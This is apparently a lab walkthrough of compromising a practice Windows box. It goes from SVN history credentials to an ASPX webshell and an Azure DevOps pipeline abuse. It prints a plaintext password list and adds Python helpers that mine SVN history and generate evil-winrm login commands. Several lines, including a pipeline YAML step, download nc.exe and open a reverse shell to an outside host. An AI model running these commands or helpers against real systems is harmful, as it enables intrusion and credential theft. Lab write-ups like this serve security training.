sudo nmap -p- -n --open -v 10.10.10.203
nmap -p 80,3690,5985 -sV -A 10.10.10.203
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open svnserve Subversion
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Port 80 serves the IIS default page. Directory brute-forcing turns up aspnet_client, but requesting it returns 403.
Port 3690 is svnserve, and an unauthenticated (anonymous) connection succeeds:
svn ls svn://10.10.10.203
That gives us a username, nathen; the r2 and r4 revisions in the history look interesting.
svn checkout svn://10.10.10.203
Check the project out locally. From the project name and the contents of moved.txt we get two subdomains (add both to /etc/hosts):
dimension.worker.htb
devops.worker.htb
dimension.worker.htb is the pure front-end html5up site described in the README. Its pages mention several more subdomains, all running the same front-end template.
The devops subdomain is behind HTTP authentication, and we have no credentials for it.
The way in is probably still in the commit history, so switch to r2 first:
svn up -r2
Nice, that yields a username and password. They log us into devops.worker.htb; trying them over WinRM fails.
It's Azure DevOps. A quick search shows that a pipeline can be configured to run arbitrary commands.
Edit the script (the command cmd will execute).
But clicking Run complains that we have no permission on the Default agent pool.
Another route: create a new branch and upload an ASPX webshell.
Click Approve; the required work item is created right here, on the fly.
After the merge completes, confirm the file is on master. Note that the repository selected by default here is spectra (one of the subdomains found earlier in dimension).
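The finding above (credentials committed in r2 and gone again by r4) is the general SVN lesson: anything ever committed stays recoverable with `svn up -r N` or `svn cat -r N`. The script below, an added example and not code from the original writeup, automates that hunt: it parses `svn log --xml`, walks every per-revision `svn diff -c N`, and reports secret-looking lines together with the revision that added them and, if any, the one that deleted them. The log XML, the diffs and the file name deploy.txt are constructed sample data, not captured from the target; for a live run `svn` must be on PATH.

```python
"""Mine an SVN repository's history for credentials that were later removed.

Added example, not part of the original writeup. SAMPLE_LOG / SAMPLE_DIFFS are
constructed to mirror the r2/r4 situation described above; deploy.txt is an
assumed file name. scan_repo() runs the same logic live via the svn CLI.
"""
import re
import subprocess
import xml.etree.ElementTree as ET

# A "user = pass" / "user - pass" / "user: pass" style line, or anything with a password-ish keyword.
USERPASS_RE = re.compile(r'^\s*([A-Za-z][\w.-]{2,})\s*[-=:]\s*(\S{4,})\s*$')
KEYWORD_RE = re.compile(r'(?i)(password|passwd|pwd|secret|token|api[_-]?key)\s*[=:]\s*\S+')


def revisions_from_log_xml(xml_text):
    """Return [(rev, author, msg), ...] oldest first, parsed from `svn log --xml`."""
    root = ET.fromstring(xml_text)
    revs = []
    for entry in root.findall('logentry'):
        revs.append((int(entry.get('revision')),
                     (entry.findtext('author') or '').strip(),
                     (entry.findtext('msg') or '').strip()))
    return sorted(revs)


def changed_lines(diff_text):
    """Yield (path, sign, text) for each added ('+') or removed ('-') line of an svn unified diff."""
    path = None
    for line in diff_text.splitlines():
        if line.startswith('Index: '):
            path = line[len('Index: '):].strip()
        elif line.startswith(('+++ ', '--- ')):
            continue                      # file headers, not content
        elif path and line[:1] in ('+', '-'):
            yield path, line[0], line[1:]


def looks_like_secret(text):
    return bool(USERPASS_RE.match(text) or KEYWORD_RE.search(text))


def history_secrets(log_xml, diff_by_rev):
    """Map (path, line) -> {'added': rev, 'removed': rev or None} for secret-looking lines.

    A line added in one revision and deleted in a later one is exactly what
    `svn up -r <added>` brings back; a 'removed' revision is a strong hint that
    somebody considered the line sensitive.
    """
    found = {}
    for rev, _author, _msg in revisions_from_log_xml(log_xml):
        for path, sign, text in changed_lines(diff_by_rev.get(rev, '')):
            if not looks_like_secret(text):
                continue
            key = (path, text.strip())
            if sign == '+':
                found.setdefault(key, {'added': rev, 'removed': None})
            elif key in found and found[key]['removed'] is None:
                found[key]['removed'] = rev
    return found


def scan_repo(url):
    """Live version: fetch the log and every per-revision diff from the server (needs `svn`)."""
    log_xml = subprocess.check_output(['svn', 'log', '--xml', url], text=True)
    diffs = {}
    for rev, _a, _m in revisions_from_log_xml(log_xml):
        diffs[rev] = subprocess.check_output(['svn', 'diff', '-c', str(rev), url], text=True)
    return history_secrets(log_xml, diffs)


# --- constructed sample data (not captured from the target) ---
SAMPLE_LOG = """<log>
<logentry revision="4"><author>nathen</author><msg>Moving stuff</msg></logentry>
<logentry revision="3"><author>nathen</author><msg>Adding deployment info</msg></logentry>
<logentry revision="2"><author>nathen</author><msg>Initial commit</msg></logentry>
<logentry revision="1"><author>nathen</author><msg>Create repo</msg></logentry>
</log>"""

SAMPLE_DIFFS = {
    2: "Index: deploy.txt\n===================================================================\n"
       "--- deploy.txt\t(nonexistent)\n+++ deploy.txt\t(revision 2)\n@@ -0,0 +1,2 @@\n"
       "+nathen = wendel98\n+Remember to remove this file before going live\n",
    4: "Index: deploy.txt\n===================================================================\n"
       "--- deploy.txt\t(revision 3)\n+++ deploy.txt\t(nonexistent)\n@@ -1,2 +0,0 @@\n"
       "-nathen = wendel98\n-Remember to remove this file before going live\n"
       "Index: moved.txt\n===================================================================\n"
       "--- moved.txt\t(nonexistent)\n+++ moved.txt\t(revision 4)\n@@ -0,0 +1 @@\n"
       "+Moved to devops.worker.htb\n",
}

if __name__ == '__main__':
    for (path, line), when in history_secrets(SAMPLE_LOG, SAMPLE_DIFFS).items():
        print(f"{path}: {line!r} added in r{when['added']}, removed in r{when['removed']}")
```

Against a real server, `scan_repo('svn://10.10.10.203')` does the whole walk in one go; the regexes are deliberately loose, so treat the output as a shortlist to read by hand rather than as a verdict.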
powershell -c wget 10.10.14.15/nc.exe -outfile \programdata\nc.exe
\programdata\nc.exe -e cmd.exe 10.10.14.15 2333
This cmd.aspx gets cleaned up quickly, so be fast, or just upload an msfvenom-generated reverse-shell ASPX instead.
c:\Users>dir
Volume in drive C has no label.
Volume Serial Number is 32D6-9041
Directory of c:\Users
2020-07-07 16:53 <DIR> .
2020-07-07 16:53 <DIR> ..
2020-03-28 14:59 <DIR> .NET v4.5
2020-03-28 14:59 <DIR> .NET v4.5 Classic
2020-08-17 23:33 <DIR> Administrator
2020-03-28 14:01 <DIR> Public
2020-07-22 00:11 <DIR> restorer
2020-07-08 18:22 <DIR> robisl
0 File(s) 0 bytes
8 Dir(s) 10 470 170 624 bytes free
Besides Administrator, the users restorer and robisl are worth a look.
where /R c:\ README.txt
I wanted to locate the directory where Azure DevOps stores its repositories, but found nothing, which was odd.
Reading a walkthrough, it turns out there is a second drive letter besides C:.
On the W: drive, W:\svnrepos\www\conf\passwd holds a list of passwords:
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
That list contains the robisl user we saw earlier. WinRM login succeeds and we get user.txt, but this user is not allowed to run systeminfo.
evil-winrm -u robisl -p wolves11 -i 10.10.10.203
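The passwd file above is a flat svnserve credential store, and the useful step is not the file itself but matching it against the accounts that actually exist on the box (nathen's password did nothing over WinRM; robisl's did). The script below is an added example, not code from the original writeup: it parses the [users] section by hand (configparser would reject or silently collapse the duplicate nichin entry), pulls account names out of the `dir C:\Users` listing, keeps only the pairs whose username exists locally, and emits ready-to-run evil-winrm commands. The passwd and dir excerpts are assembled from what this page shows so the script runs offline.

```python
"""Turn a leaked svnserve passwd file into WinRM candidates.

Added example, not part of the original writeup. SAMPLE_PASSWD and SAMPLE_DIR
are excerpts of the page's own output, assembled here for an offline run.
"""
import re
import shlex

DIR_RE = re.compile(r'<DIR>\s+(.+?)\s*$')


def parse_svn_passwd(text):
    """Return [(user, password), ...] from the [users] section, duplicates included."""
    creds, in_users = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        if line.startswith('[') and line.endswith(']'):
            in_users = line[1:-1].strip().lower() == 'users'
            continue
        if in_users and '=' in line:
            user, _, pwd = line.partition('=')
            creds.append((user.strip(), pwd.strip()))
    return creds


def users_from_dir_listing(text):
    """Account names from `dir C:\\Users` output; skips '.', '..' and dot-prefixed IIS pool dirs."""
    names = []
    for line in text.splitlines():
        m = DIR_RE.search(line)
        if m and not m.group(1).startswith('.'):
            names.append(m.group(1))
    return names


def winrm_candidates(creds, local_users):
    """Credential pairs whose username matches a local account (Windows names are case-insensitive)."""
    wanted = {u.lower() for u in local_users}
    return [(u, p) for u, p in creds if u.lower() in wanted]


def evil_winrm_commands(pairs, host):
    """Shell-safe evil-winrm invocations, one per candidate pair."""
    return [f"evil-winrm -i {host} -u {shlex.quote(u)} -p {shlex.quote(p)}" for u, p in pairs]


SAMPLE_PASSWD = """### This file is an example password file for svnserve.
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
robish = onesare
robisl = wolves11
robive = andwhich
"""

SAMPLE_DIR = """ Directory of c:\\Users
2020-07-07 16:53 <DIR> .
2020-07-07 16:53 <DIR> ..
2020-03-28 14:59 <DIR> .NET v4.5
2020-08-17 23:33 <DIR> Administrator
2020-03-28 14:01 <DIR> Public
2020-07-22 00:11 <DIR> restorer
2020-07-08 18:22 <DIR> robisl
"""

if __name__ == '__main__':
    creds = parse_svn_passwd(SAMPLE_PASSWD)
    local = users_from_dir_listing(SAMPLE_DIR)
    for cmd in evil_winrm_commands(winrm_candidates(creds, local), '10.10.10.203'):
        print(cmd)
```

The local-user filter is what keeps this from being a noisy spray of 40 accounts against WinRM; if nothing matches, the full `creds` list is still there for a wider attempt against the other services.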
robisl can also log into devops.worker, where there is a new project.
This user can start pipelines, and the error differs from nathen's: it now says the Default pool does not exist.
Delete the pool line from the YAML and try again; it actually runs.
The output appears in the log of the one-line script step.
We have already read root.txt, but let's get a shell anyway.
Modify the pipeline YAML as follows; the multi-line script downloads nc and spawns a reverse shell (the pipeline run will hang at this step):
# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- master

steps:
- script: type C:\Users\Administrator\Desktop\root.txt
  displayName: 'Run a one-line script'

- script: |
    powershell -c wget 10.10.14.15/nc.exe -outfile c:\programdata\nc.exe
    c:\programdata\nc.exe -e cmd.exe 10.10.14.15 2333
  displayName: 'get reverse shell'
According to another article, from the initial IIS shell you can also escalate to SYSTEM with RoguePotato.